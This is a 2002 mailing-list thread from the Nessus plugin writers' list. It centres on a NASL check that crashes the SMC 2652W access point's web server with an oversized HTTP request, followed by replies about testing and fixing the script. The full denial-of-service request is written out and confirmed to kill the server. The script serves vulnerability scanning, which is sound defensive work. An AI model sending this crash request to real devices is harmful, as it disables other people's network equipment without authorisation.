Mailing List Archive

Since my last 4 nasls just made it to CVS, does that mean I can send more
now? ;-)

The script below was a 0-effort jobbie and credits go to Dave Aitel's
SPIKE....

#
# Copyright 2002 by John Lampe ... j_lampe@bellsouth.net
# BUG FOUND WITH SPIKE 2.7
# See the Nessus Scripts License for details
#


if(description)
{
script_id();
script_version ("$Revision: 0.1 $");
name["english"] = "Crash SMC AP";
script_name(english:name["english"]);
desc["english"] = "
The SMC 2652W Access point web server crashes when sent a specially
formatted HTTP request. Contact vendor
for a fix

Risk factor : Medium/Low";

script_description(english:desc["english"]);
summary["english"] = "Crash SMC Access Point";
script_summary(english:summary["english"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2002 John
Lampe...j_lampe@bellsouth.net");
family["english"] = "General";
script_family(english:family["english"]);
exit(0);
}

#
# The script code starts here
#
# found with SPIKE 2.7 http://www.immunitysec.com/spike.html
# req string directly horked from SPIKE API

port = get_kb_item("Services/www");
if(!port)port = 80;

req = string("GET /", crap(240), ".html?OpenElement&FieldElemFormat=gif
HTTP/1.1\r\n");
req = string(req, "Referer: http://localhost/bob\r\n");
req = string(req, "Content-Type: application/x-www-form-urlencoded\r\n");
req = string(req, "Connection: Keep-Alive\r\n");
req = string(req, "Cookie: VARIABLE=DAVEAITEL; path=/\r\n");
req = string(req, "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2
i686)\r\n");
req = string(req, "Variable: result\r\n");
req = string(req, "Host: localhost\r\nContent-length: 13\r\n");
req = string(req, "Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, image/png\r\n");
req = string(req, "Accept-Encoding: gzip\r\nAccept-Language:
en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");


soc = open_sock_tcp(port);
if (soc) {
send(socket:soc, data:req);
close(soc);
}

soc = open_sock_tcp(port);
if (!soc) {security_hole(port); exit(0); }
req = string("GET / HTTP/1.0\r\n\r\n");
send(socket:soc, data:req);
bling = recv(socket:soc, length:1024, timeout:5);
if (!bling) security_hole(port);




John Lampe
https://f00dikator.hn.org/

"Knowledge will forever govern ignorance, and a people who mean to be their
own governors, must arm themselves with the power knowledge gives. A popular
government without popular information or the means of acquiring it, is but
a prologue to a farce or a tragedy or perhaps both."
--James Madison

----- Original Message -----
From: "Thomas Reinke" <reinke@e-softinc.com>
To: "John Lampe" <j_lampe@bellsouth.net>
Cc: "plugins writer" <plugins-writers@list.nessus.org>; "Renaud Deraison"
<deraison@cvs.nessus.org>
Sent: Wednesday, October 09, 2002 3:23 PM
Subject: Re: Scripts


John Lampe wrote:
> 4 scripts here.
> citrix.nasl looks for citrix published applications (based on perl script
by
> ian.vitek@ixsecurity.com)
> sql_injection.nasl tries to poison cgi params (based on wpoison)
> uddi.inc is an include file for creating SOAP headers
> uddi.nasl looks for .net servers which have public web services being
> offered via uddi registry (should maybe add DISCO in the future?)
>
> John Lampe
> https://f00dikator.hn.org/
>
> "Knowledge will forever govern ignorance, and a people who mean to be
their
> own governors, must arm themselves with the power knowledge gives. A
popular
> government without popular information or the means of acquiring it, is
but
> a prologue to a farce or a tragedy or perhaps both."
> --James Madison
>

Any reason why these haven't been included in the standard
distribution of nasl scripts?

Thomas

Script works fine at killing the webserver...however, it doesn't report the
security_hole()

I tried from GUI and from command line

nessus# nasl -t 10.10.10.31 smc_www_dos.nasl
smc_www_dos.nasl : Warning : evaluating unknown variable - description
smc_www_dos.nasl - Error ! Function "http_is_dead" does not exist
smc_www_dos.nasl - Error ! Function "http_is_dead" does not exist
nessus# nessusd -d
This is Nessus 1.2.6 for FreeBSD 4.5-RELEASE
compiled with gcc version 2.95.3 20010315 (release) [FreeBSD]
Current setup :
Experimental session-saving : enabled
Experimental KB saving : enabled
Thread manager : fork
nasl : 1.2.6
libnessus : 1.2.6
SSL support : enabled
SSL is used for client / server communication
Running as euid : 0

John Lampe
https://f00dikator.hn.org/

"Knowledge will forever govern ignorance, and a people who mean to be their
own governors, must arm themselves with the power knowledge gives. A popular
government without popular information or the means of acquiring it, is but
a prologue to a farce or a tragedy or perhaps both."
--James Madison

----- Original Message -----
From: "Renaud Deraison" <deraison@nessus.org>
To: "plugins writer" <plugins-writers@list.nessus.org>
Sent: Thursday, October 10, 2002 6:11 AM
Subject: Re: Scripts



Could you check that the script still works against an SMC AP ?


-- Renaud

On Wed, Oct 09, 2002 at 07:38:41PM +0100, John Lampe wrote:
> The script below was a 0-effort jobbie and credits go to Dave Aitel's
> SPIKE....

Attached is a somewhat revised version of your script - it correctly
fills the 'Host:' header so that it will go through a transparent proxy,
and it uses http_is_dead() to determine if the check needs to be made or
was successful.

Could you check that the script still works against an SMC AP ?


-- Renaud

"John Lampe" <j_lampe@bellsouth.net> writes:

> smc_www_dos.nasl - Error ! Function "http_is_dead" does not exist

Add this line:
include("http_func.inc");